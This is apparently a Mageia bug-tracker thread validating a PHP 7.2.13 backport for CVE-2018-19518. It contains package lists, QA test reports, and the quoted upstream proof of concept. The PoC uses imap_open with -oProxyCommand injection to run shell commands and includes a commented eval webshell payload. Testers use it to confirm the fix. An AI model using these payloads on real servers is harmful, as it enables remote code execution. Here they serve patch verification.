Suggested advisory:
========================

Updated php packages fix security vulnerabilities:

Bypassing disabled exec functions in PHP via imap_open (CVE-2018-19518).


References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518
========================

Updated packages in core/backports_testing:
========================
php-ini-7.2.13-2.mga6
apache-mod_php-7.2.13-2.mga6
php-cli-7.2.13-2.mga6
php-cgi-7.2.13-2.mga6
lib64php_common7-7.2.13-2.mga6
php-devel-7.2.13-2.mga6
php-openssl-7.2.13-2.mga6
php-zlib-7.2.13-2.mga6
php-doc-7.2.13-2.mga6.noarch
php-bcmath-7.2.13-2.mga6
php-bz2-7.2.13-2.mga6
php-calendar-7.2.13-2.mga6
php-ctype-7.2.13-2.mga6
php-curl-7.2.13-2.mga6
php-dba-7.2.13-2.mga6
php-dom-7.2.13-2.mga6
php-enchant-7.2.13-2.mga6
php-exif-7.2.13-2.mga6
php-fileinfo-7.2.13-2.mga6
php-filter-7.2.13-2.mga6
php-ftp-7.2.13-2.mga6
php-gd-7.2.13-2.mga6
php-gettext-7.2.13-2.mga6
php-gmp-7.2.13-2.mga6
php-hash-7.2.13-2.mga6
php-iconv-7.2.13-2.mga6
php-imap-7.2.13-2.mga6
php-interbase-7.2.13-2.mga6
php-intl-7.2.13-2.mga6
php-json-7.2.13-2.mga6
php-ldap-7.2.13-2.mga6
php-mbstring-7.2.13-2.mga6
php-mysqli-7.2.13-2.mga6
php-mysqlnd-7.2.13-2.mga6
php-odbc-7.2.13-2.mga6
php-opcache-7.2.13-2.mga6
php-pcntl-7.2.13-2.mga6
php-pdo-7.2.13-2.mga6
php-pdo_dblib-7.2.13-2.mga6
php-pdo_firebird-7.2.13-2.mga6
php-pdo_mysql-7.2.13-2.mga6
php-pdo_odbc-7.2.13-2.mga6
php-pdo_pgsql-7.2.13-2.mga6
php-pdo_sqlite-7.2.13-2.mga6
php-pgsql-7.2.13-2.mga6
php-phar-7.2.13-2.mga6
php-posix-7.2.13-2.mga6
php-readline-7.2.13-2.mga6
php-recode-7.2.13-2.mga6
php-session-7.2.13-2.mga6
php-shmop-7.2.13-2.mga6
php-snmp-7.2.13-2.mga6
php-soap-7.2.13-2.mga6
php-sockets-7.2.13-2.mga6
php-sqlite3-7.2.13-2.mga6
php-sysvmsg-7.2.13-2.mga6
php-sysvsem-7.2.13-2.mga6
php-sysvshm-7.2.13-2.mga6
php-tidy-7.2.13-2.mga6
php-tokenizer-7.2.13-2.mga6
php-xml-7.2.13-2.mga6
php-xmlreader-7.2.13-2.mga6
php-xmlrpc-7.2.13-2.mga6
php-xmlwriter-7.2.13-2.mga6
php-xsl-7.2.13-2.mga6
php-wddx-7.2.13-2.mga6
php-zip-7.2.13-2.mga6
php-fpm-7.2.13-2.mga6
phpdbg-7.2.13-2.mga6
php-debuginfo-7.2.13-2.mga6

Source RPMs:
php-7.2.13-2.mga6.src.rpm

This is a backport

QA Contact: security => (none)
CC: (none) => tmb
Component: Security => Backports

There is a php-mcrypt in 5.6.39, none in 7.2.13 ?

CC: (none) => herman.viaene

in php 7 this is not boundled in main php. it is external (pecl) and is already in backports (version  ~ 1.x)

Sorry, I don't get where you're pointing at.
The 5.X package is still installed and so are packages libtomcrypt0, libmcrypt4 and libmcrypt, but the one we need is still missing in this installation because:
$ php -S localhost:8000
[Fri Dec 14 11:43:17 2018] PHP Warning:  PHP Startup: Unable to load dynamic library 'mcrypt.so' (tried: /usr/lib/php/extensions/mcrypt.so (/usr/lib/php/extensions/mcrypt.so: undefined symbol: _zend_list_delete), /usr/lib/php/extensions/mcrypt.so.so (/usr/lib/php/extensions/mcrypt.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
[Fri Dec 14 11:43:19 2018] PHP Warning:  PHP Startup: Unable to load dynamic library 'apcu.so' (tried: /usr/lib/php/extensions/apcu.so (/usr/lib/php/extensions/apcu.so: undefined symbol: zval_used_for_init), /usr/lib/php/extensions/apcu.so.so (/usr/lib/php/extensions/apcu.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP 7.2.13 Development Server started at Fri Dec 14 11:43:20 2018
Listening on http://localhost:8000
Document root is /home/tester6/Documenten

But this does not block the http://localhost:8000/create-png.php to work correctly.

both apcu and mcrypt are "extensions".
mcrypt is backported:
http://ftp.acc.umu.se/mirror/mageia/distrib/6/x86_64/media/core/backports/php-mcrypt-1.0.1-5.mga6.x86_64.rpm

APC is an optional cache, which is kind of obsolete, so I didn't backport this extension yet. All extensions should be bound to the php-version (5.6.x, 7.2.x), but this was missed. But I'll correct this for the mga7 release.

Trying this for x86_64.
Installed the php7.2 files from backports and ran a couple of tests.
Created file containing
"<?php phpinfo(); ?>"

$ php phpinfo.php | less
phpinfo()
PHP Version => 7.2.11
[...]
If you did not receive a copy of the PHP license, or have any
questions about PHP licensing, please contact license@php.net.

Started a server at localhost:8000
$ php -S localhost:8000 -t php
PHP 7.2.11 Development Server started at Fri Dec 14 16:37:14 2018
Listening on http://localhost:8000
Document root is /home/lcl/dev/php
Press Ctrl-C to quit.

Referring to comment 5: the acpu and mcrypt extensions were not installed but the server started up OK.

In a browser:
http://localhost:8000/create-png.php

That showed a blue square on a black background.

localhost:8000/sample.php
Showed:
Now hear this. This is you captain speaking.All hands on deck. Abandon ship. 

That is as far as I can take it.  What this package really needs is a test suite to properly exercize all or many of the functions.

There is a PoC for CVE-2018-19518 at https://bugs.php.net/bug.php?id=76428
which consists of two short scripts but without any instructions for running them that a newbie could understand.

Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Skipped those and updated from backports testing.
Restarted apache and ran the simple tests again.

phpinfo()
PHP Version => 7.2.13

The server logged:
[Fri Dec 14 17:23:15 2018] 127.0.0.1:48006 [200]: /sample.php
[Fri Dec 14 17:23:51 2018] 127.0.0.1:48016 [200]: /create-png.php

On the basis of these basic tests and a clean install this is OK for 64-bits.

CC: (none) => tarazed25

Installed and tested without issues.

Tests included several large and small scripts, common (e.g. wordpress, drupal, roundcube) and custom scripts. No regressions noticed.

System: Mageia 6, x86_64, Intel CPU.

$ uname -a
Linux marte 4.14.78-desktop-1.mga6 #1 SMP Sun Oct 21 20:31:12 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ rpm -qa | grep php.*-7.2 | sort
apache-mod_php-7.2.13-2.mga6
lib64php_common7-7.2.13-2.mga6
php-bz2-7.2.13-2.mga6
php-cli-7.2.13-2.mga6
php-ctype-7.2.13-2.mga6
php-curl-7.2.13-2.mga6
php-dom-7.2.13-2.mga6
php-fileinfo-7.2.13-2.mga6
php-filter-7.2.13-2.mga6
php-ftp-7.2.13-2.mga6
php-gd-7.2.13-2.mga6
php-gettext-7.2.13-2.mga6
php-hash-7.2.13-2.mga6
php-iconv-7.2.13-2.mga6
php-ini-7.2.13-2.mga6
php-intl-7.2.13-2.mga6
php-json-7.2.13-2.mga6
php-ldap-7.2.13-2.mga6
php-mbstring-7.2.13-2.mga6
php-mysqli-7.2.13-2.mga6
php-mysqlnd-7.2.13-2.mga6
php-openssl-7.2.13-2.mga6
php-pdo-7.2.13-2.mga6
php-pdo_mysql-7.2.13-2.mga6
php-pdo_pgsql-7.2.13-2.mga6
php-pdo_sqlite-7.2.13-2.mga6
php-pgsql-7.2.13-2.mga6
php-phar-7.2.13-2.mga6
php-posix-7.2.13-2.mga6
php-session-7.2.13-2.mga6
php-sysvsem-7.2.13-2.mga6
php-sysvshm-7.2.13-2.mga6
php-tokenizer-7.2.13-2.mga6
php-xml-7.2.13-2.mga6
php-xmlreader-7.2.13-2.mga6
php-xmlwriter-7.2.13-2.mga6
php-zip-7.2.13-2.mga6
php-zlib-7.2.13-2.mga6

CC: (none) => mageia

@ PC_LX.  Thanks for extending the tests.  Yours are probably a lot more useful.
Any idea about how the PoC could be run?  The mailbox stuff is way above my head.

Tested the PoC in comment #7 and no external command was executed (e.g. touch /tmp/PWN) so I think it is fixed.

Had to install php-imap to make the test.

$ rpm -q php-imap
php-imap-7.2.13-2.mga6

@PC_LX.  Don't know how you did it but thanks for running it and the hint about php-imap.

Thanks to all of you. Validating. No advisory for backports.

CC: (none) => lewyssmith
Keywords: (none) => validated_backport

is there any more action missing?!

packages moved

Resolution: (none) => FIXED
Status: NEW => RESOLVED